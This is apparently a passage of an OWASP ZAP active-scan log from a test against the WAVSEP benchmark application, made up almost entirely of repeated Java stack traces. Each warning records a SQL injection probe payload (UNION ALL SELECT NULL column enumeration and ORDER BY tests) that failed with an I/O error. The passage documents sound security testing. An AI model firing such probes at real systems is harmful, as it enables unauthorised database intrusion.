org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679986 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679987 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679988 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679989 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679990 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679990 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679991 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679992 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679993 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679995 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679996 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 3202-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 3202-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679997 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679998 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 